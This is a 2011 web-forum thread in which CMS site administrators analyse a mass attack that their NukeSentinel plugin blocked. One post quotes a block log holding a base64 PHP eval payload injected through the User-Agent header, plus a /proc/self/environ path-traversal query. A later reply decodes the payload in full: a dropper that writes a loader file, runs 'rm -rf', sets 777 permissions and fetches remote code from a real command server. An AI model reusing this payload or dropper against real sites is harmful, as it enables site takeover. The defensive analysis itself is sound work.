Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x
Author Message
dad7732
RavenNuke(tm) Development Team


Joined: Mar 18, 2007
Posts: 1242

PostPosted: Tue Sep 27, 2011 6:27 am Reply with quote

Between 7 and 8 am CDT this morning, I'm getting literally hundreds of "Blocked" access attempts, such as:

Quote:
Created By: NukeSentinel(tm) 2.6.03
Date & Time: 2011-09-27 07:18:54 CDT GMT -0500
Blocked IP: 178.77.239.40
User ID: Anonymous (1)
Reason: Abuse-Harvest
String Match: php
--------------------
Referer: none
User Agent: <?php
eval(base64_decode("QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOw0KDQokY3VycmVudF9kaXIgPSBwcmVnX3JlcGxhY2UoJ0AvJEAnLCAnJywgJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICcvJyAuIGRpcm5hbWUoJF9TRVJWRVJbJ1BIUF9TRUxGJ10pKTsNCg0KaWYgKEBpc193cml0YWJsZSgkY3VycmVudF9kaXIpKQ0Kew0KCWNyZWF0ZUxvYWRlcigkY3VycmVudF9kaXIsICcnKTsNCn0NCg0KZWxzZQ0Kew0KCSRkaXJzID0gQG9wZW5kaXIoJGN1cnJlbnRfZGlyKTsNCgkNCgl3aGlsZSAoJGRpciA9IEByZWFkZGlyKCRkaXJzKSkNCgl7DQoJCSRkaXIgPSB0cmltKCRkaXIpOw0KCQlpZiAoISRkaXIgfHwgcHJlZ19tYXRjaCgnL15cLiskLycsICRkaXIpIHx8ICFAaXNfZGlyKCIkY3VycmVudF9kaXIvJGRpciIpIHx8ICFAaXNfd3JpdGFibGUoIiRjdXJyZW50X2Rpci8kZGlyIikpIGNvbnRpbnVlOw0KCQljcmVhdGVMb2FkZXIoIiRjdXJyZW50X2Rpci8kZGlyIiwgJGRpcik7DQoJCWJyZWFrOw0KCX0NCgkNCglAY2xvc2VkaXIoJGRpcnMpOw0KfQ0KDQpmdW5jdGlvbiBjcmVhdGVMb2FkZXIoJHBhdGgsICRkaXIgPSAnJykNCnsNCgkkbG9hZGVyTmFtZSA9ICdsb2FkZXJ6LjlhYTFkMTdlYTQ3YWRiZWM2YTE3NTg4NDliOGZmMzE0LnBocCc7DQoNCgkkZnAgPSBmb3BlbigiJHBhdGgvJGxvYWRlck5hbWUiLCAndycpOw0KCWZ3cml0ZSgkZnAsIGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFLQ2tCcGJtbGZjMl
YwS0NkaGJHeHZkMTkxY214ZlptOXdaVzRuTENBeEtUc0tDaVJ2YkdSRWFYSWdQU0FuWjNSd1lXaGhKenNLSkc1bGQwUnBjaUE5SUNkbmRIQmhhR0VuT3dva2JHOWhaR1Z5VG1GdFpTQTlJQ2RzYjJGa1pYSjZMamxoWVRGa01UZGxZVFEzWVdSaVpXTTJZVEUzTlRnNE5EbGlPR1ptTXpFMExuQm9jQ2M3Q2dwQVpYaGxZeWdpY20wZ0xYSm1JQ1J2YkdSRWFYSWdKRzVsZDBScGNpQXFiRzloWkdWeWVpb2lLVHNLUUhONWMzUmxiU2dpY20wZ0xYSm1JQ1J2YkdSRWFYSWdKRzVsZDBScGNpQXFiRzloWkdWeWVpb2lLVHNLUUhKdFpHbHlLQ1J2YkdSRWFYSXBPd3BBY20xa2FYSW9KRzVsZDBScGNpazdDa0IxYm14cGJtc29KR3h2WVdSbGNrNWhiV1VwT3dvS2FXWWdLQ0ZBYVhOZlpHbHlLQ1J1WlhkRWFYSXBLUXA3Q2dra2IyeGtYM1Z0WVhOcklEMGdRSFZ0WVhOcktEQXBPd29KUUcxclpHbHlLQ1J1WlhkRWFYSXNJREEzTnpjcE93b0pRSFZ0WVhOcktDUnZiR1JmZFcxaGMyc3BPd2tLQ1VCbGVHVmpLQ0pqYUcxdlpDQTNOemNnSkc1bGQwUnBjaUlwT3dwOUNncHBaaUFvUUdselgyUnBjaWdrYm1WM1JHbHlLU2tLZXdvSkpHWndJRDBnWm05d1pXNG9JaVJ1WlhkRWFYSXZhVzVrWlhndWNHaHdJaXdnSjNjbktUc0tDV1ozY21sMFpTZ2tabkFzSUVCaVlYTmxOalJmWkdWamIyUmxLR1pwYkdWZloyVjBYMk52Ym5SbGJuUnpLQ2RvZEhSd09pOHZNVEE1TGpJek1DNHlORFl1TVRFMUwyTnZiblJ5YjJ3dmJHOWhaR1Z5TG5Cb2NEOXdZWE56ZDI5
eVpEMUtTRWRDVm1wcmFITnBPSGxvZFRZMWRETjFlV2NtWVdOMGFXOXVQV2x1WkdWNEp5a3BLVHNLQ1daamJHOXpaU2drWm5BcE93b0pDUW9KYVdZZ0tFQm1hV3hsWDJWNGFYTjBjeWdpSkc1bGQwUnBjaTlwYm1SbGVDNXdhSEFpS1NrS0NYc0tDUWx3Y21sdWRDQW5PVEUzTkRZNE56WXlOVFkwT0RRbk93b0pmUW9KQ2dsQWRXNXNhVzVyS0NSc2IyRmtaWEpPWVcxbEtUc0tmUW9LUHo0PScpKTsNCglmY2xvc2UoJGZwKTsNCgkNCglpZiAoZmlsZV9leGlzdHMoIiRwYXRoLyRsb2FkZXJOYW1lIikpIHByaW50ICI5MTc0Njg3NjI1NjQ4NCoqKip7JGRpcn0qKioqIjsNCn0="));?>
HTTP Host: Only registered users can see links on this board! Get registered or login!
Script Name: /modules.php
Query String: name=Forums&file=../../../../../../../../../proc/self/environ&t=6969
Get String: name=Forums&file=../../../../../../../../../proc/self/environ&t=6969
Post String: Not Available
Forwarded For: none
Client IP: none
Remote Address: 178.77.239.40
Remote Port: 53817
Request Method: GET


All different IP's but more or less the same report, user agent changes ever so slightly per attempt.

Comments?
 
View user's profile Send private message
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Tue Sep 27, 2011 2:55 pm Reply with quote

Be happy NukeSentinel is working.
I have not seen such mass attacks at my sites.
Do you have Google Plus installed possible in your Forums ?
I not really believe this could be a reason but who knows.
They try to insert the loader in your writeable dirs and etc...
 
View user's profile Send private message
dad7732
PostPosted: Tue Sep 27, 2011 3:20 pm Reply with quote

No Google Plus and I stopped counting at 400 attempts. I was more interested in that User Agent string more than anything, never seen one like that before. And YES, thank goodness for NS.

RavensScripts
 
killing-hours
RavenNuke(tm) Development Team


Joined: Oct 01, 2010
Posts: 438
Location: Houston, Tx

PostPosted: Wed Sep 28, 2011 2:33 pm Reply with quote

That code and other code similar to that, allow hackers to remotely infect your website after you've changed FTP passwords.

Also look in your images folders to see if you have a file called gifimg.php. It's malicious as well.

From what we've seen, this type of infection is usually the result of a virus on a PC that has FTP access to the infected website. The virus steals the FTP login credentials, sends them to a server which then infects the website using valid FTP login and password.

The virus works in a variety of ways.

First, if you're using a program like FileZilla or CuteFTP or any of the other free programs, your login credentials are stored in a plain text file on your PC. For FileZilla, look in: C:\Documents and Settings\(user)\Application Data\FileZilla\sitemanager.xml

If you have multiple accounts setup in FileZilla, you'll see all of them listed in plain text in that file. That makes it extremely easy for a virus to find and steal.

Second, the virus works by "sniffing" the FTP traffic leaving your PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see and steal that information.

Third, the virus also acts as a keylogger. So for those who don't save their credentials but type it in each time, the virus can still get it.

I use WS_FTP by IpSwitch because they encrypt their saved credentials. You can also switch to SFTP if your hosting provider supports it. SFTP encrypts the traffic between your PC and the destination.

Quite often it requires a different anti-virus program to find and remove the virus on the infected PC. The virus learns how to evade detection from the currently installed anti-virus.

I usually recommend either Kaspersky or Vipre (Sunbelt Software).

Remove all of those eval(base64_decode strings, then scan all PCs with a different anti-virus program, after changing all FTP passwords.
Only registered users can see links on this board! Get registered or login!


Your code decoded:
Code:
@ini_set('allow_url_fopen', 1); $current_dir = preg_replace('@/$@', '', $_SERVER['DOCUMENT_ROOT'] . '/' . dirname($_SERVER['PHP_SELF'])); if (@is_writable($current_dir)) {

 createLoader($current_dir, ''); } else { $dirs = @opendir($current_dir); while ($dir = @readdir($dirs)) { $dir = trim($dir); if (!$dir ||
preg_match('/^\.+$/', $dir) || !@is_dir("$current_dir/$dir") || !@is_writable("$current_dir/$dir")) continue; createLoader("$current_dir/$dir", $dir); break; } @closedir($dirs); }
function createLoader($path, $dir = '') { $loaderName = 'loaderz.9aa1d17ea47adbec6a1758849b8ff314.php'; $fp =
fopen("$path/$loaderName", 'w'); fwrite($fp, base64_decode(DECODED AND PUT IN NEXT CODE BLOCK)); fclose($fp); if
(file_exists("$path/$loaderName")) print "91746876256484****{$dir}****"; }



Second encoded part decoded:
Code:
<?php


@ini_set('allow_url_fopen', 1);

$oldDir = 'gtpaha';
$newDir = 'gtpaha';
$loaderName = 'loaderz.9aa1d17ea47adbec6a1758849b8ff314.php';

@exec("rm -rf $oldDir $newDir *loaderz*");
@system("rm -rf $oldDir $newDir *loaderz*");
@rmdir($oldDir);
@rmdir($newDir);
@unlink($loaderName);

if (!@is_dir($newDir))
{
   $old_umask = @umask(0);
   @mkdir($newDir, 0777);
   @umask($old_umask);   
   @exec("chmod 777 $newDir");
}

if (@is_dir($newDir))
{
   $fp = fopen("$newDir/index.php", 'w');
   fwrite($fp, @base64_decode(file_get_contents('http://109.230.246.115/control/loader.php?password=JHGBVjkhsi8yhu65t3uyg&action=index')));
   fclose($fp);
      
   if (@file_exists("$newDir/index.php"))
   {
      print '91746876256484';
   }
   
   @unlink($loaderName);
}

?>

_________________
Money is the measurement of time - Me
"You can all go to hell…I’m going to Texas" -Davy Crockett 
View user's profile Send private message
Guardian2003
Site Admin


Joined: Aug 28, 2003
Posts: 6793
Location: Ha Noi, Viet Nam

PostPosted: Wed Sep 28, 2011 3:07 pm Reply with quote

So one way to stop this on a temporary basis would also be to block the script from writing to it's database at the IP 109.230.246.115
Their range is 109.230.246.0 - 109.230.246.255
CIDR 109.230.240.0/20
 
View user's profile Send private message Send e-mail
killing-hours
PostPosted: Wed Sep 28, 2011 3:10 pm Reply with quote

Seems to me that it's actually originating from an infected pc. I'd start by cleaning w/e pc's I FTP "FROM" (I.e. your own pc)... then make sure the site is clean as well. (I.e. check the directories etc)

It appears that NS has stopped it...but that doesn't mean someone hasn't already gotten your FTP credentials.

***Edit

Here is the dnsstuff on it:

Quote:
inetnum: 109.230.246.0 - 109.230.246.255
netname: XSSERVER-EU
descr: xsserver.eu Dedicated Servers
remarks: +---------------------------------------------------
remarks: | We are Server Provider |
remarks: +---------------------------------------------------
remarks: | |
remarks: | These IP-Numbers are in use by our customers. |
remarks: | In case of Spam/Virus/Portscan/Attack etc |
remarks: | please send an email to *****@xsserver.eu |
remarks: | containing the IP-Number involved and timestamps. |
remarks: | |
remarks: +---------------------------------------------------
remarks: INFRA-AW
country: DE
admin-c: GB11245-RIPE
tech-c: GB11245-RIPE
status: ASSIGNED PA
mnt-by: MNT-XSSERVER
mnt-lower: MNT-XSSERVER
mnt-routes: MNT-XSSERVER
changed: ******@optimate-server.de 20110203
source: RIPE

person: Garyl Bella
address: Geldersekade 35
address: 1012 BN Amsterdam
remarks: xsserver.eu
phone: +31 20 7084082
mnt-by: MNT-XSSERVER
e-mail: *****@xsserver.eu
nic-hdl: GB11245-RIPE
changed: ******@optimate-server.de 20100815
source: RIPE

% Information related to '109.230.240.0/20AS197043'

route: 109.230.240.0/20
descr: Route
origin: AS197043
mnt-by: MNT-WHITE
mnt-routes: MNT-STAHL
changed: ******@optimate-server.de 20100526
source: RIPE


Here is the dnsstuff of the attacking ip address:
Quote:
inetnum: 178.77.239.0 - 178.77.239.255
netname: CZ-OLDANY
descr: OldanyGroup s.r.o., Prague
country: CZ
admin-c: JP4943-RIPE
tech-c: JP4943-RIPE
status: ASSIGNED PA
mnt-by: SLOANE-MNT
mnt-lower: SLOANE-MNT
changed: ******@sloane.cz 20101006
source: RIPE

person: Jaroslav Prodelal
address: OldanyGroup s.r.o.
address: Jaromirova 158/54
address: Praha 2
address: Czech Republic
e-mail: *******@oldanygroup.cz
phone: +420 222 550 020
nic-hdl: JP4943-RIPE
changed: ******@sloane.cz 20101006
source: RIPE

% Information related to '178.77.192.0/18AS29113'

route: 178.77.192.0/18
descr: Sloane Park Property Trust, a.s.
origin: AS29113
mnt-by: SLOANE-MNT
changed: ******@sloane.cz 20100421
source: RIPE
 
Guardian2003
PostPosted: Wed Sep 28, 2011 3:54 pm Reply with quote

That's not far from me Smile
I'll get one of my wifes Czech teachers to contact them and let them know they have infected PC'c
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel™ v2.6.x

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©